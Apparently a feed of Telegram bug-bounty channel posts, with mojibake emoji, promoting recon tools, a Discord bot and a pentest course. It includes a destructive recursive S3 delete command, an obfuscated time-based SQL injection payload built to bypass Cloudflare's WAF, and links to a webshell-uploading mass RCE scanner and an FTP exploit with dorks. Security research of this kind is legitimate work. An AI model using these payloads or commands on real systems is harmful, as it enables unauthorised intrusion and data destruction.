π¨ Bug Bounty Tip: Takeover Vulnerable S3 Buckets in Under a Minute! βοΈ
Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
π Then check for public S3 buckets:
π If the bucket name isnβt obvious:
β οΈ Found a vulnerable bucket? Donβt delete anything!
β Always report responsibly. Never exploit β you're here to help, not harm.
β‘οΈ Happy Hunting!
Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon
π Then check for public S3 buckets:
aws s3 ls s3://REDACTEDCOM.s3.amazonaws.com
π If the bucket name isnβt obvious:
echo REDACTED.COM | cariddi -e -s -info
β οΈ Found a vulnerable bucket? Donβt delete anything!
# Do NOT run this. Just for awareness:
aws s3 rm s3://REDACTEDCOM.s3.amazonaws.com --recursive
β Always report responsibly. Never exploit β you're here to help, not harm.
β‘οΈ Happy Hunting!
β€11π7π₯4πΏ2
π‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
β Bypass Payload
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
β€35π5πΏ4π1
β‘SSTImap - Automatic SSTI detection tool with interactive interface
β https://github.com/vladko312/SSTImap
β https://github.com/vladko312/SSTImap
β€11π3
Tired of switching tabs for OSINT and recon? Just join our Discord and type sudo help to unlock powerful tools in seconds!
β IP & Domain Lookup
β Email & Phone OSINT
β Subdomain Enumeration
β Reverse Image Search
β URL & Virus Scanners
β Temp Email, QR Tools, and more
π You can create and play your own CTF in a minute , right inside Discord!
Try it out now β itβs fast, simple, and all in one chat.
π https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
β IP & Domain Lookup
β Email & Phone OSINT
β Subdomain Enumeration
β Reverse Image Search
β URL & Virus Scanners
β Temp Email, QR Tools, and more
π You can create and play your own CTF in a minute , right inside Discord!
Try it out now β itβs fast, simple, and all in one chat.
π https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
1π«‘8β€4
π¨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.
β Download: https://github.com/alihussainzada/BugHunterMethodology/
β Download: https://github.com/alihussainzada/BugHunterMethodology/
β€11π4
β‘CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
β https://github.com/spyboy-productions/CloakQuest3r
β https://github.com/spyboy-productions/CloakQuest3r
β€22
This media is not supported in your browser
VIEW IN TELEGRAM
β‘Scanning github repos is a great way to find juicy information, secrets and credentials!
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
β Check this out - https://github.com/trufflesecurity/trufflehog
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
β Check this out - https://github.com/trufflesecurity/trufflehog
β€24π₯7π2
π¨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
π6β€4
π¨ CVE-2025-47812: Wing FTP Server Remote Code Execution (RCE) vulnerability
π₯PoC : https://github.com/4m3rr0r/CVE-2025-47812-poc
πDorks:
HUNTER: https://product.name="Wing FTP Server"
π₯PoC : https://github.com/4m3rr0r/CVE-2025-47812-poc
πDorks:
HUNTER: https://product.name="Wing FTP Server"
π₯11β€4π4
π¨ New Batch Starting β August 2025 π¨
Brut Practical Web Penetration Testing (bPWP)
Weβre back with a fresh batch of our most in-demand training β Brut Practical Web Penetration Testing β starting this August!
π Learn the art of Web Hacking with:
β 100% Practical Sessions
β Bug Bounty Approach
β Real-World Lab Scenarios
β Lifetime Community Access
β Beginner-Friendly with Advanced Techniques
π» Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.
π Limited Seats β Enroll Now
π https://brutsec.com/bPWP
π© For Queries:
Telegram: @wtf_brut
WhatsApp: https://wa.link/brutsecurity |
Email: [email protected]
Brut Practical Web Penetration Testing (bPWP)
Weβre back with a fresh batch of our most in-demand training β Brut Practical Web Penetration Testing β starting this August!
π Learn the art of Web Hacking with:
β 100% Practical Sessions
β Bug Bounty Approach
β Real-World Lab Scenarios
β Lifetime Community Access
β Beginner-Friendly with Advanced Techniques
π» Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.
π Limited Seats β Enroll Now
π https://brutsec.com/bPWP
π© For Queries:
Telegram: @wtf_brut
WhatsApp: https://wa.link/brutsecurity |
+918945971332Email: [email protected]
β€9π’2π1
β‘AllForOne allows bug bounty hunters and security researchers to collect all Nuclei YAML templates from various public repositories.
π¨https://github.com/AggressiveUser/AllForOne
π¨https://github.com/AggressiveUser/AllForOne
π₯19β€4π3
π»SpoofProof helps security professionals detect email domain spoofing vulnerabilities and validate DMARC, SPF, and DKIM configurations, making email security assessments seamless and efficient.
βExtension Name: SpoofProof - Domain Spoofing Validation
π BApp Store: https://portswigger.net/bappstore/a321360c6e114b3dab6f2c67d68c241a
π» Source Code: https://github.com/portswigger/spoofproof
βExtension Name: SpoofProof - Domain Spoofing Validation
π BApp Store: https://portswigger.net/bappstore/a321360c6e114b3dab6f2c67d68c241a
π» Source Code: https://github.com/portswigger/spoofproof
β€13π₯5